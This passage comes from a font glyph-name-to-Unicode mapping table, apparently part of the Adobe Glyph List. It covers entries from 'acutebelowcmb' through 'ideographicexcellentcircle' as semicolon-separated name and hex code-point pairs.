acutebelowcmb;0317
acutecmb;0301
acutecomb;0301
acutedeva;0954
acutelowmod;02CF
acutetonecmb;0341
acyrillic;0430
adblgrave;0201
addakgurmukhi;0A71
adeva;0905
adieresis;00E4
adieresiscyrillic;04D3
adieresismacron;01DF
adotbelow;1EA1
adotmacron;01E1
ae;00E6
aeacute;01FD
aekorean;3150
aemacron;01E3
afii00208;2015
afii08941;20A4
afii10017;0410
afii10018;0411
afii10019;0412
afii10020;0413
afii10021;0414
afii10022;0415
afii10023;0401
afii10024;0416
afii10025;0417
afii10026;0418
afii10027;0419
afii10028;041A
afii10029;041B
afii10030;041C
afii10031;041D
afii10032;041E
afii10033;041F
afii10034;0420
afii10035;0421
afii10036;0422
afii10037;0423
afii10038;0424
afii10039;0425
afii10040;0426
afii10041;0427
afii10042;0428
afii10043;0429
afii10044;042A
afii10045;042B
afii10046;042C
afii10047;042D
afii10048;042E
afii10049;042F
afii10050;0490
afii10051;0402
afii10052;0403
afii10053;0404
afii10054;0405
afii10055;0406
afii10056;0407
afii10057;0408
afii10058;0409
afii10059;040A
afii10060;040B
afii10061;040C
afii10062;040E
afii10063;F6C4
afii10064;F6C5
afii10065;0430
afii10066;0431
afii10067;0432
afii10068;0433
afii10069;0434
afii10070;0435
afii10071;0451
afii10072;0436
afii10073;0437
afii10074;0438
afii10075;0439
afii10076;043A
afii10077;043B
afii10078;043C
afii10079;043D
afii10080;043E
afii10081;043F
afii10082;0440
afii10083;0441
afii10084;0442
afii10085;0443
afii10086;0444
afii10087;0445
afii10088;0446
afii10089;0447
afii10090;0448
afii10091;0449
afii10092;044A
afii10093;044B
afii10094;044C
afii10095;044D
afii10096;044E
afii10097;044F
afii10098;0491
afii10099;0452
afii10100;0453
afii10101;0454
afii10102;0455
afii10103;0456
afii10104;0457
afii10105;0458
afii10106;0459
afii10107;045A
afii10108;045B
afii10109;045C
afii10110;045E
afii10145;040F
afii10146;0462
afii10147;0472
afii10148;0474
afii10192;F6C6
afii10193;045F
afii10194;0463
afii10195;0473
afii10196;0475
afii10831;F6C7
afii10832;F6C8
afii10846;04D9
afii299;200E
afii300;200F
afii301;200D
afii57381;066A
afii57388;060C
afii57392;0660
afii57393;0661
afii57394;0662
afii57395;0663
afii57396;0664
afii57397;0665
afii57398;0666
afii57399;0667
afii57400;0668
afii57401;0669
afii57403;061B
afii57407;061F
afii57409;0621
afii57410;0622
afii57411;0623
afii57412;0624
afii57413;0625
afii57414;0626
afii57415;0627
afii57416;0628
afii57417;0629
afii57418;062A
afii57419;062B
afii57420;062C
afii57421;062D
afii57422;062E
afii57423;062F
afii57424;0630
afii57425;0631
afii57426;0632
afii57427;0633
afii57428;0634
afii57429;0635
afii57430;0636
afii57431;0637
afii57432;0638
afii57433;0639
afii57434;063A
afii57440;0640
afii57441;0641
afii57442;0642
afii57443;0643
afii57444;0644
afii57445;0645
afii57446;0646
afii57448;0648
afii57449;0649
afii57450;064A
afii57451;064B
afii57452;064C
afii57453;064D
afii57454;064E
afii57455;064F
afii57456;0650
afii57457;0651
afii57458;0652
afii57470;0647
afii57505;06A4
afii57506;067E
afii57507;0686
afii57508;0698
afii57509;06AF
afii57511;0679
afii57512;0688
afii57513;0691
afii57514;06BA
afii57519;06D2
afii57534;06D5
afii57636;20AA
afii57645;05BE
afii57658;05C3
afii57664;05D0
afii57665;05D1
afii57666;05D2
afii57667;05D3
afii57668;05D4
afii57669;05D5
afii57670;05D6
afii57671;05D7
afii57672;05D8
afii57673;05D9
afii57674;05DA
afii57675;05DB
afii57676;05DC
afii57677;05DD
afii57678;05DE
afii57679;05DF
afii57680;05E0
afii57681;05E1
afii57682;05E2
afii57683;05E3
afii57684;05E4
afii57685;05E5
afii57686;05E6
afii57687;05E7
afii57688;05E8
afii57689;05E9
afii57690;05EA
afii57694;FB2A
afii57695;FB2B
afii57700;FB4B
afii57705;FB1F
afii57716;05F0
afii57717;05F1
afii57718;05F2
afii57723;FB35
afii57793;05B4
afii57794;05B5
afii57795;05B6
afii57796;05BB
afii57797;05B8
afii57798;05B7
afii57799;05B0
afii57800;05B2
afii57801;05B1
afii57802;05B3
afii57803;05C2
afii57804;05C1
afii57806;05B9
afii57807;05BC
afii57839;05BD
afii57841;05BF
afii57842;05C0
afii57929;02BC
afii61248;2105
afii61289;2113
afii61352;2116
afii61573;202C
afii61574;202D
afii61575;202E
afii61664;200C
afii63167;066D
afii64937;02BD
agrave;00E0
agujarati;0A85
agurmukhi;0A05
ahiragana;3042
ahookabove;1EA3
aibengali;0990
aibopomofo;311E
aideva;0910
aiecyrillic;04D5
aigujarati;0A90
aigurmukhi;0A10
aimatragurmukhi;0A48
ainarabic;0639
ainfinalarabic;FECA
aininitialarabic;FECB
ainmedialarabic;FECC
ainvertedbreve;0203
aivowelsignbengali;09C8
aivowelsigndeva;0948
aivowelsigngujarati;0AC8
akatakana;30A2
akatakanahalfwidth;FF71
akorean;314F
alef;05D0
alefarabic;0627
alefdageshhebrew;FB30
aleffinalarabic;FE8E
alefhamzaabovearabic;0623
alefhamzaabovefinalarabic;FE84
alefhamzabelowarabic;0625
alefhamzabelowfinalarabic;FE88
alefhebrew;05D0
aleflamedhebrew;FB4F
alefmaddaabovearabic;0622
alefmaddaabovefinalarabic;FE82
alefmaksuraarabic;0649
alefmaksurafinalarabic;FEF0
alefmaksurainitialarabic;FEF3
alefmaksuramedialarabic;FEF4
alefpatahhebrew;FB2E
alefqamatshebrew;FB2F
aleph;2135
allequal;224C
alpha;03B1
alphatonos;03AC
amacron;0101
amonospace;FF41
ampersand;0026
ampersandmonospace;FF06
ampersandsmall;F726
amsquare;33C2
anbopomofo;3122
angbopomofo;3124
angkhankhuthai;0E5A
angle;2220
anglebracketleft;3008
anglebracketleftvertical;FE3F
anglebracketright;3009
anglebracketrightvertical;FE40
angleleft;2329
angleright;232A
angstrom;212B
anoteleia;0387
anudattadeva;0952
anusvarabengali;0982
anusvaradeva;0902
anusvaragujarati;0A82
aogonek;0105
apaatosquare;3300
aparen;249C
apostrophearmenian;055A
apostrophemod;02BC
apple;F8FF
approaches;2250
approxequal;2248
approxequalorimage;2252
approximatelyequal;2245
araeaekorean;318E
araeakorean;318D
arc;2312
arighthalfring;1E9A
aring;00E5
aringacute;01FB
aringbelow;1E01
arrowboth;2194
arrowdashdown;21E3
arrowdashleft;21E0
arrowdashright;21E2
arrowdashup;21E1
arrowdblboth;21D4
arrowdbldown;21D3
arrowdblleft;21D0
arrowdblright;21D2
arrowdblup;21D1
arrowdown;2193
arrowdownleft;2199
arrowdownright;2198
arrowdownwhite;21E9
arrowheaddownmod;02C5
arrowheadleftmod;02C2
arrowheadrightmod;02C3
arrowheadupmod;02C4
arrowhorizex;F8E7
arrowleft;2190
arrowleftdbl;21D0
arrowleftdblstroke;21CD
arrowleftoverright;21C6
arrowleftwhite;21E6
arrowright;2192
arrowrightdblstroke;21CF
arrowrightheavy;279E
arrowrightoverleft;21C4
arrowrightwhite;21E8
arrowtableft;21E4
arrowtabright;21E5
arrowup;2191
arrowupdn;2195
arrowupdnbse;21A8
arrowupdownbase;21A8
arrowupleft;2196
arrowupleftofdown;21C5
arrowupright;2197
arrowupwhite;21E7
arrowvertex;F8E6
asciicircum;005E
asciicircummonospace;FF3E
asciitilde;007E
asciitildemonospace;FF5E
ascript;0251
ascriptturned;0252
asmallhiragana;3041
asmallkatakana;30A1
asmallkatakanahalfwidth;FF67
asterisk;002A
asteriskaltonearabic;066D
asteriskarabic;066D
asteriskmath;2217
asteriskmonospace;FF0A
asterisksmall;FE61
asterism;2042
asuperior;F6E9
asymptoticallyequal;2243
at;0040
atilde;00E3
atmonospace;FF20
atsmall;FE6B
aturned;0250
aubengali;0994
aubopomofo;3120
audeva;0914
augujarati;0A94
augurmukhi;0A14
aulengthmarkbengali;09D7
aumatragurmukhi;0A4C
auvowelsignbengali;09CC
auvowelsigndeva;094C
auvowelsigngujarati;0ACC
avagrahadeva;093D
aybarmenian;0561
ayin;05E2
ayinaltonehebrew;FB20
ayinhebrew;05E2
b;0062
babengali;09AC
backslash;005C
backslashmonospace;FF3C
badeva;092C
bagujarati;0AAC
bagurmukhi;0A2C
bahiragana;3070
bahtthai;0E3F
bakatakana;30D0
bar;007C
barmonospace;FF5C
bbopomofo;3105
bcircle;24D1
bdotaccent;1E03
bdotbelow;1E05
beamedsixteenthnotes;266C
because;2235
becyrillic;0431
beharabic;0628
behfinalarabic;FE90
behinitialarabic;FE91
behiragana;3079
behmedialarabic;FE92
behmeeminitialarabic;FC9F
behmeemisolatedarabic;FC08
behnoonfinalarabic;FC6D
bekatakana;30D9
benarmenian;0562
bet;05D1
beta;03B2
betasymbolgreek;03D0
betdagesh;FB31
betdageshhebrew;FB31
bethebrew;05D1
betrafehebrew;FB4C
bhabengali;09AD
bhadeva;092D
bhagujarati;0AAD
bhagurmukhi;0A2D
bhook;0253
bihiragana;3073
bikatakana;30D3
bilabialclick;0298
bindigurmukhi;0A02
birusquare;3331
blackcircle;25CF
blackdiamond;25C6
blackdownpointingtriangle;25BC
blackleftpointingpointer;25C4
blackleftpointingtriangle;25C0
blacklenticularbracketleft;3010
blacklenticularbracketleftvertical;FE3B
blacklenticularbracketright;3011
blacklenticularbracketrightvertical;FE3C
blacklowerlefttriangle;25E3
blacklowerrighttriangle;25E2
blackrectangle;25AC
blackrightpointingpointer;25BA
blackrightpointingtriangle;25B6
blacksmallsquare;25AA
blacksmilingface;263B
blacksquare;25A0
blackstar;2605
blackupperlefttriangle;25E4
blackupperrighttriangle;25E5
blackuppointingsmalltriangle;25B4
blackuppointingtriangle;25B2
blank;2423
blinebelow;1E07
block;2588
bmonospace;FF42
bobaimaithai;0E1A
bohiragana;307C
bokatakana;30DC
bparen;249D
bqsquare;33C3
braceex;F8F4
braceleft;007B
braceleftbt;F8F3
braceleftmid;F8F2
braceleftmonospace;FF5B
braceleftsmall;FE5B
bracelefttp;F8F1
braceleftvertical;FE37
braceright;007D
bracerightbt;F8FE
bracerightmid;F8FD
bracerightmonospace;FF5D
bracerightsmall;FE5C
bracerighttp;F8FC
bracerightvertical;FE38
bracketleft;005B
bracketleftbt;F8F0
bracketleftex;F8EF
bracketleftmonospace;FF3B
bracketlefttp;F8EE
bracketright;005D
bracketrightbt;F8FB
bracketrightex;F8FA
bracketrightmonospace;FF3D
bracketrighttp;F8F9
breve;02D8
brevebelowcmb;032E
brevecmb;0306
breveinvertedbelowcmb;032F
breveinvertedcmb;0311
breveinverteddoublecmb;0361
bridgebelowcmb;032A
bridgeinvertedbelowcmb;033A
brokenbar;00A6
bstroke;0180
bsuperior;F6EA
btopbar;0183
buhiragana;3076
bukatakana;30D6
bullet;2022
bulletinverse;25D8
bulletoperator;2219
bullseye;25CE
c;0063
caarmenian;056E
cabengali;099A
cacute;0107
cadeva;091A
cagujarati;0A9A
cagurmukhi;0A1A
calsquare;3388
candrabindubengali;0981
candrabinducmb;0310
candrabindudeva;0901
candrabindugujarati;0A81
capslock;21EA
careof;2105
caron;02C7
caronbelowcmb;032C
caroncmb;030C
carriagereturn;21B5
cbopomofo;3118
ccaron;010D
ccedilla;00E7
ccedillaacute;1E09
ccircle;24D2
ccircumflex;0109
ccurl;0255
cdot;010B
cdotaccent;010B
cdsquare;33C5
cedilla;00B8
cedillacmb;0327
cent;00A2
centigrade;2103
centinferior;F6DF
centmonospace;FFE0
centoldstyle;F7A2
centsuperior;F6E0
chaarmenian;0579
chabengali;099B
chadeva;091B
chagujarati;0A9B
chagurmukhi;0A1B
chbopomofo;3114
cheabkhasiancyrillic;04BD
checkmark;2713
checyrillic;0447
chedescenderabkhasiancyrillic;04BF
chedescendercyrillic;04B7
chedieresiscyrillic;04F5
cheharmenian;0573
chekhakassiancyrillic;04CC
cheverticalstrokecyrillic;04B9
chi;03C7
chieuchacirclekorean;3277
chieuchaparenkorean;3217
chieuchcirclekorean;3269
chieuchkorean;314A
chieuchparenkorean;3209
chochangthai;0E0A
chochanthai;0E08
chochingthai;0E09
chochoethai;0E0C
chook;0188
cieucacirclekorean;3276
cieucaparenkorean;3216
cieuccirclekorean;3268
cieuckorean;3148
cieucparenkorean;3208
cieucuparenkorean;321C
circle;25CB
circlemultiply;2297
circleot;2299
circleplus;2295
circlepostalmark;3036
circlewithlefthalfblack;25D0
circlewithrighthalfblack;25D1
circumflex;02C6
circumflexbelowcmb;032D
circumflexcmb;0302
clear;2327
clickalveolar;01C2
clickdental;01C0
clicklateral;01C1
clickretroflex;01C3
club;2663
clubsuitblack;2663
clubsuitwhite;2667
cmcubedsquare;33A4
cmonospace;FF43
cmsquaredsquare;33A0
coarmenian;0581
colon;003A
colonmonetary;20A1
colonmonospace;FF1A
colonsign;20A1
colonsmall;FE55
colontriangularhalfmod;02D1
colontriangularmod;02D0
comma;002C
commaabovecmb;0313
commaaboverightcmb;0315
commaaccent;F6C3
commaarabic;060C
commaarmenian;055D
commainferior;F6E1
commamonospace;FF0C
commareversedabovecmb;0314
commareversedmod;02BD
commasmall;FE50
commasuperior;F6E2
commaturnedabovecmb;0312
commaturnedmod;02BB
compass;263C
congruent;2245
contourintegral;222E
control;2303
controlACK;0006
controlBEL;0007
controlBS;0008
controlCAN;0018
controlCR;000D
controlDC1;0011
controlDC2;0012
controlDC3;0013
controlDC4;0014
controlDEL;007F
controlDLE;0010
controlEM;0019
controlENQ;0005
controlEOT;0004
controlESC;001B
controlETB;0017
controlETX;0003
controlFF;000C
controlFS;001C
controlGS;001D
controlHT;0009
controlLF;000A
controlNAK;0015
controlRS;001E
controlSI;000F
controlSO;000E
controlSOT;0002
controlSTX;0001
controlSUB;001A
controlSYN;0016
controlUS;001F
controlVT;000B
copyright;00A9
copyrightsans;F8E9
copyrightserif;F6D9
cornerbracketleft;300C
cornerbracketlefthalfwidth;FF62
cornerbracketleftvertical;FE41
cornerbracketright;300D
cornerbracketrighthalfwidth;FF63
cornerbracketrightvertical;FE42
corporationsquare;337F
cosquare;33C7
coverkgsquare;33C6
cparen;249E
cruzeiro;20A2
cstretched;0297
curlyand;22CF
curlyor;22CE
currency;00A4
cyrBreve;F6D1
cyrFlex;F6D2
cyrbreve;F6D4
cyrflex;F6D5
d;0064
daarmenian;0564
dabengali;09A6
dadarabic;0636
dadeva;0926
dadfinalarabic;FEBE
dadinitialarabic;FEBF
dadmedialarabic;FEC0
dagesh;05BC
dageshhebrew;05BC
dagger;2020
daggerdbl;2021
dagujarati;0AA6
dagurmukhi;0A26
dahiragana;3060
dakatakana;30C0
dalarabic;062F
dalet;05D3
daletdagesh;FB33
daletdageshhebrew;FB33
dalethatafpatah;05D3 05B2
dalethatafpatahhebrew;05D3 05B2
dalethatafsegol;05D3 05B1
dalethatafsegolhebrew;05D3 05B1
dalethebrew;05D3
dalethiriq;05D3 05B4
dalethiriqhebrew;05D3 05B4
daletholam;05D3 05B9
daletholamhebrew;05D3 05B9
daletpatah;05D3 05B7
daletpatahhebrew;05D3 05B7
daletqamats;05D3 05B8
daletqamatshebrew;05D3 05B8
daletqubuts;05D3 05BB
daletqubutshebrew;05D3 05BB
daletsegol;05D3 05B6
daletsegolhebrew;05D3 05B6
daletsheva;05D3 05B0
daletshevahebrew;05D3 05B0
dalettsere;05D3 05B5
dalettserehebrew;05D3 05B5
dalfinalarabic;FEAA
dammaarabic;064F
dammalowarabic;064F
dammatanaltonearabic;064C
dammatanarabic;064C
danda;0964
dargahebrew;05A7
dargalefthebrew;05A7
dasiapneumatacyrilliccmb;0485
dblGrave;F6D3
dblanglebracketleft;300A
dblanglebracketleftvertical;FE3D
dblanglebracketright;300B
dblanglebracketrightvertical;FE3E
dblarchinvertedbelowcmb;032B
dblarrowleft;21D4
dblarrowright;21D2
dbldanda;0965
dblgrave;F6D6
dblgravecmb;030F
dblintegral;222C
dbllowline;2017
dbllowlinecmb;0333
dbloverlinecmb;033F
dblprimemod;02BA
dblverticalbar;2016
dblverticallineabovecmb;030E
dbopomofo;3109
dbsquare;33C8
dcaron;010F
dcedilla;1E11
dcircle;24D3
dcircumflexbelow;1E13
dcroat;0111
ddabengali;09A1
ddadeva;0921
ddagujarati;0AA1
ddagurmukhi;0A21
ddalarabic;0688
ddalfinalarabic;FB89
dddhadeva;095C
ddhabengali;09A2
ddhadeva;0922
ddhagujarati;0AA2
ddhagurmukhi;0A22
ddotaccent;1E0B
ddotbelow;1E0D
decimalseparatorarabic;066B
decimalseparatorpersian;066B
decyrillic;0434
degree;00B0
dehihebrew;05AD
dehiragana;3067
deicoptic;03EF
dekatakana;30C7
deleteleft;232B
deleteright;2326
delta;03B4
deltaturned;018D
denominatorminusonenumeratorbengali;09F8
dezh;02A4
dhabengali;09A7
dhadeva;0927
dhagujarati;0AA7
dhagurmukhi;0A27
dhook;0257
dialytikatonos;0385
dialytikatonoscmb;0344
diamond;2666
diamondsuitwhite;2662
dieresis;00A8
dieresisacute;F6D7
dieresisbelowcmb;0324
dieresiscmb;0308
dieresisgrave;F6D8
dieresistonos;0385
dihiragana;3062
dikatakana;30C2
dittomark;3003
divide;00F7
divides;2223
divisionslash;2215
djecyrillic;0452
dkshade;2593
dlinebelow;1E0F
dlsquare;3397
dmacron;0111
dmonospace;FF44
dnblock;2584
dochadathai;0E0E
dodekthai;0E14
dohiragana;3069
dokatakana;30C9
dollar;0024
dollarinferior;F6E3
dollarmonospace;FF04
dollaroldstyle;F724
dollarsmall;FE69
dollarsuperior;F6E4
dong;20AB
dorusquare;3326
dotaccent;02D9
dotaccentcmb;0307
dotbelowcmb;0323
dotbelowcomb;0323
dotkatakana;30FB
dotlessi;0131
dotlessj;F6BE
dotlessjstrokehook;0284
dotmath;22C5
dottedcircle;25CC
doubleyodpatah;FB1F
doubleyodpatahhebrew;FB1F
downtackbelowcmb;031E
downtackmod;02D5
dparen;249F
dsuperior;F6EB
dtail;0256
dtopbar;018C
duhiragana;3065
dukatakana;30C5
dz;01F3
dzaltone;02A3
dzcaron;01C6
dzcurl;02A5
dzeabkhasiancyrillic;04E1
dzecyrillic;0455
dzhecyrillic;045F
e;0065
eacute;00E9
earth;2641
ebengali;098F
ebopomofo;311C
ebreve;0115
ecandradeva;090D
ecandragujarati;0A8D
ecandravowelsigndeva;0945
ecandravowelsigngujarati;0AC5
ecaron;011B
ecedillabreve;1E1D
echarmenian;0565
echyiwnarmenian;0587
ecircle;24D4
ecircumflex;00EA
ecircumflexacute;1EBF
ecircumflexbelow;1E19
ecircumflexdotbelow;1EC7
ecircumflexgrave;1EC1
ecircumflexhookabove;1EC3
ecircumflextilde;1EC5
ecyrillic;0454
edblgrave;0205
edeva;090F
edieresis;00EB
edot;0117
edotaccent;0117
edotbelow;1EB9
eegurmukhi;0A0F
eematragurmukhi;0A47
efcyrillic;0444
egrave;00E8
egujarati;0A8F
eharmenian;0567
ehbopomofo;311D
ehiragana;3048
ehookabove;1EBB
eibopomofo;311F
eight;0038
eightarabic;0668
eightbengali;09EE
eightcircle;2467
eightcircleinversesansserif;2791
eightdeva;096E
eighteencircle;2471
eighteenparen;2485
eighteenperiod;2499
eightgujarati;0AEE
eightgurmukhi;0A6E
eighthackarabic;0668
eighthangzhou;3028
eighthnotebeamed;266B
eightideographicparen;3227
eightinferior;2088
eightmonospace;FF18
eightoldstyle;F738
eightparen;247B
eightperiod;248F
eightpersian;06F8
eightroman;2177
eightsuperior;2078
eightthai;0E58
einvertedbreve;0207
eiotifiedcyrillic;0465
ekatakana;30A8
ekatakanahalfwidth;FF74
ekonkargurmukhi;0A74
ekorean;3154
elcyrillic;043B
element;2208
elevencircle;246A
elevenparen;247E
elevenperiod;2492
elevenroman;217A
ellipsis;2026
ellipsisvertical;22EE
emacron;0113
emacronacute;1E17
emacrongrave;1E15
emcyrillic;043C
emdash;2014
emdashvertical;FE31
emonospace;FF45
emphasismarkarmenian;055B
emptyset;2205
enbopomofo;3123
encyrillic;043D
endash;2013
endashvertical;FE32
endescendercyrillic;04A3
eng;014B
engbopomofo;3125
enghecyrillic;04A5
enhookcyrillic;04C8
enspace;2002
eogonek;0119
eokorean;3153
eopen;025B
eopenclosed;029A
eopenreversed;025C
eopenreversedclosed;025E
eopenreversedhook;025D
eparen;24A0
epsilon;03B5
epsilontonos;03AD
equal;003D
equalmonospace;FF1D
equalsmall;FE66
equalsuperior;207C
equivalence;2261
erbopomofo;3126
ercyrillic;0440
ereversed;0258
ereversedcyrillic;044D
escyrillic;0441
esdescendercyrillic;04AB
esh;0283
eshcurl;0286
eshortdeva;090E
eshortvowelsigndeva;0946
eshreversedloop;01AA
eshsquatreversed;0285
esmallhiragana;3047
esmallkatakana;30A7
esmallkatakanahalfwidth;FF6A
estimated;212E
esuperior;F6EC
eta;03B7
etarmenian;0568
etatonos;03AE
eth;00F0
etilde;1EBD
etildebelow;1E1B
etnahtafoukhhebrew;0591
etnahtafoukhlefthebrew;0591
etnahtahebrew;0591
etnahtalefthebrew;0591
eturned;01DD
eukorean;3161
euro;20AC
evowelsignbengali;09C7
evowelsigndeva;0947
evowelsigngujarati;0AC7
exclam;0021
exclamarmenian;055C
exclamdbl;203C
exclamdown;00A1
exclamdownsmall;F7A1
exclammonospace;FF01
exclamsmall;F721
existential;2203
ezh;0292
ezhcaron;01EF
ezhcurl;0293
ezhreversed;01B9
ezhtail;01BA
f;0066
fadeva;095E
fagurmukhi;0A5E
fahrenheit;2109
fathaarabic;064E
fathalowarabic;064E
fathatanarabic;064B
fbopomofo;3108
fcircle;24D5
fdotaccent;1E1F
feharabic;0641
feharmenian;0586
fehfinalarabic;FED2
fehinitialarabic;FED3
fehmedialarabic;FED4
feicoptic;03E5
female;2640
ff;FB00
ffi;FB03
ffl;FB04
fi;FB01
fifteencircle;246E
fifteenparen;2482
fifteenperiod;2496
figuredash;2012
filledbox;25A0
filledrect;25AC
finalkaf;05DA
finalkafdagesh;FB3A
finalkafdageshhebrew;FB3A
finalkafhebrew;05DA
finalkafqamats;05DA 05B8
finalkafqamatshebrew;05DA 05B8
finalkafsheva;05DA 05B0
finalkafshevahebrew;05DA 05B0
finalmem;05DD
finalmemhebrew;05DD
finalnun;05DF
finalnunhebrew;05DF
finalpe;05E3
finalpehebrew;05E3
finaltsadi;05E5
finaltsadihebrew;05E5
firsttonechinese;02C9
fisheye;25C9
fitacyrillic;0473
five;0035
fivearabic;0665
fivebengali;09EB
fivecircle;2464
fivecircleinversesansserif;278E
fivedeva;096B
fiveeighths;215D
fivegujarati;0AEB
fivegurmukhi;0A6B
fivehackarabic;0665
fivehangzhou;3025
fiveideographicparen;3224
fiveinferior;2085
fivemonospace;FF15
fiveoldstyle;F735
fiveparen;2478
fiveperiod;248C
fivepersian;06F5
fiveroman;2174
fivesuperior;2075
fivethai;0E55
fl;FB02
florin;0192
fmonospace;FF46
fmsquare;3399
fofanthai;0E1F
fofathai;0E1D
fongmanthai;0E4F
forall;2200
four;0034
fourarabic;0664
fourbengali;09EA
fourcircle;2463
fourcircleinversesansserif;278D
fourdeva;096A
fourgujarati;0AEA
fourgurmukhi;0A6A
fourhackarabic;0664
fourhangzhou;3024
fourideographicparen;3223
fourinferior;2084
fourmonospace;FF14
fournumeratorbengali;09F7
fouroldstyle;F734
fourparen;2477
fourperiod;248B
fourpersian;06F4
fourroman;2173
foursuperior;2074
fourteencircle;246D
fourteenparen;2481
fourteenperiod;2495
fourthai;0E54
fourthtonechinese;02CB
fparen;24A1
fraction;2044
franc;20A3
g;0067
gabengali;0997
gacute;01F5
gadeva;0917
gafarabic;06AF
gaffinalarabic;FB93
gafinitialarabic;FB94
gafmedialarabic;FB95
gagujarati;0A97
gagurmukhi;0A17
gahiragana;304C
gakatakana;30AC
gamma;03B3
gammalatinsmall;0263
gammasuperior;02E0
gangiacoptic;03EB
gbopomofo;310D
gbreve;011F
gcaron;01E7
gcedilla;0123
gcircle;24D6
gcircumflex;011D
gcommaaccent;0123
gdot;0121
gdotaccent;0121
gecyrillic;0433
gehiragana;3052
gekatakana;30B2
geometricallyequal;2251
gereshaccenthebrew;059C
gereshhebrew;05F3
gereshmuqdamhebrew;059D
germandbls;00DF
gershayimaccenthebrew;059E
gershayimhebrew;05F4
getamark;3013
ghabengali;0998
ghadarmenian;0572
ghadeva;0918
ghagujarati;0A98
ghagurmukhi;0A18
ghainarabic;063A
ghainfinalarabic;FECE
ghaininitialarabic;FECF
ghainmedialarabic;FED0
ghemiddlehookcyrillic;0495
ghestrokecyrillic;0493
gheupturncyrillic;0491
ghhadeva;095A
ghhagurmukhi;0A5A
ghook;0260
ghzsquare;3393
gihiragana;304E
gikatakana;30AE
gimarmenian;0563
gimel;05D2
gimeldagesh;FB32
gimeldageshhebrew;FB32
gimelhebrew;05D2
gjecyrillic;0453
glottalinvertedstroke;01BE
glottalstop;0294
glottalstopinverted;0296
glottalstopmod;02C0
glottalstopreversed;0295
glottalstopreversedmod;02C1
glottalstopreversedsuperior;02E4
glottalstopstroke;02A1
glottalstopstrokereversed;02A2
gmacron;1E21
gmonospace;FF47
gohiragana;3054
gokatakana;30B4
gparen;24A2
gpasquare;33AC
gradient;2207
grave;0060
gravebelowcmb;0316
gravecmb;0300
gravecomb;0300
gravedeva;0953
gravelowmod;02CE
gravemonospace;FF40
gravetonecmb;0340
greater;003E
greaterequal;2265
greaterequalorless;22DB
greatermonospace;FF1E
greaterorequivalent;2273
greaterorless;2277
greateroverequal;2267
greatersmall;FE65
gscript;0261
gstroke;01E5
guhiragana;3050
guillemotleft;00AB
guillemotright;00BB
guilsinglleft;2039
guilsinglright;203A
gukatakana;30B0
guramusquare;3318
gysquare;33C9
h;0068
haabkhasiancyrillic;04A9
haaltonearabic;06C1
habengali;09B9
hadescendercyrillic;04B3
hadeva;0939
hagujarati;0AB9
hagurmukhi;0A39
haharabic;062D
hahfinalarabic;FEA2
hahinitialarabic;FEA3
hahiragana;306F
hahmedialarabic;FEA4
haitusquare;332A
hakatakana;30CF
hakatakanahalfwidth;FF8A
halantgurmukhi;0A4D
hamzaarabic;0621
hamzadammaarabic;0621 064F
hamzadammatanarabic;0621 064C
hamzafathaarabic;0621 064E
hamzafathatanarabic;0621 064B
hamzalowarabic;0621
hamzalowkasraarabic;0621 0650
hamzalowkasratanarabic;0621 064D
hamzasukunarabic;0621 0652
hangulfiller;3164
hardsigncyrillic;044A
harpoonleftbarbup;21BC
harpoonrightbarbup;21C0
hasquare;33CA
hatafpatah;05B2
hatafpatah16;05B2
hatafpatah23;05B2
hatafpatah2f;05B2
hatafpatahhebrew;05B2
hatafpatahnarrowhebrew;05B2
hatafpatahquarterhebrew;05B2
hatafpatahwidehebrew;05B2
hatafqamats;05B3
hatafqamats1b;05B3
hatafqamats28;05B3
hatafqamats34;05B3
hatafqamatshebrew;05B3
hatafqamatsnarrowhebrew;05B3
hatafqamatsquarterhebrew;05B3
hatafqamatswidehebrew;05B3
hatafsegol;05B1
hatafsegol17;05B1
hatafsegol24;05B1
hatafsegol30;05B1
hatafsegolhebrew;05B1
hatafsegolnarrowhebrew;05B1
hatafsegolquarterhebrew;05B1
hatafsegolwidehebrew;05B1
hbar;0127
hbopomofo;310F
hbrevebelow;1E2B
hcedilla;1E29
hcircle;24D7
hcircumflex;0125
hdieresis;1E27
hdotaccent;1E23
hdotbelow;1E25
he;05D4
heart;2665
heartsuitblack;2665
heartsuitwhite;2661
hedagesh;FB34
hedageshhebrew;FB34
hehaltonearabic;06C1
heharabic;0647
hehebrew;05D4
hehfinalaltonearabic;FBA7
hehfinalalttwoarabic;FEEA
hehfinalarabic;FEEA
hehhamzaabovefinalarabic;FBA5
hehhamzaaboveisolatedarabic;FBA4
hehinitialaltonearabic;FBA8
hehinitialarabic;FEEB
hehiragana;3078
hehmedialaltonearabic;FBA9
hehmedialarabic;FEEC
heiseierasquare;337B
hekatakana;30D8
hekatakanahalfwidth;FF8D
hekutaarusquare;3336
henghook;0267
herutusquare;3339
het;05D7
hethebrew;05D7
hhook;0266
hhooksuperior;02B1
hieuhacirclekorean;327B
hieuhaparenkorean;321B
hieuhcirclekorean;326D
hieuhkorean;314E
hieuhparenkorean;320D
hihiragana;3072
hikatakana;30D2
hikatakanahalfwidth;FF8B
hiriq;05B4
hiriq14;05B4
hiriq21;05B4
hiriq2d;05B4
hiriqhebrew;05B4
hiriqnarrowhebrew;05B4
hiriqquarterhebrew;05B4
hiriqwidehebrew;05B4
hlinebelow;1E96
hmonospace;FF48
hoarmenian;0570
hohipthai;0E2B
hohiragana;307B
hokatakana;30DB
hokatakanahalfwidth;FF8E
holam;05B9
holam19;05B9
holam26;05B9
holam32;05B9
holamhebrew;05B9
holamnarrowhebrew;05B9
holamquarterhebrew;05B9
holamwidehebrew;05B9
honokhukthai;0E2E
hookabovecomb;0309
hookcmb;0309
hookpalatalizedbelowcmb;0321
hookretroflexbelowcmb;0322
hoonsquare;3342
horicoptic;03E9
horizontalbar;2015
horncmb;031B
hotsprings;2668
house;2302
hparen;24A3
hsuperior;02B0
hturned;0265
huhiragana;3075
huiitosquare;3333
hukatakana;30D5
hukatakanahalfwidth;FF8C
hungarumlaut;02DD
hungarumlautcmb;030B
hv;0195
hyphen;002D
hypheninferior;F6E5
hyphenmonospace;FF0D
hyphensmall;FE63
hyphensuperior;F6E6
hyphentwo;2010
i;0069
iacute;00ED
iacyrillic;044F
ibengali;0987
ibopomofo;3127
ibreve;012D
icaron;01D0
icircle;24D8
icircumflex;00EE
icyrillic;0456
idblgrave;0209
ideographearthcircle;328F
ideographfirecircle;328B
ideographicallianceparen;323F
ideographiccallparen;323A
ideographiccentrecircle;32A5
ideographicclose;3006
ideographiccomma;3001
ideographiccommaleft;FF64
ideographiccongratulationparen;3237
ideographiccorrectcircle;32A3
ideographicearthparen;322F
ideographicenterpriseparen;323D
ideographicexcellentcircle;329D
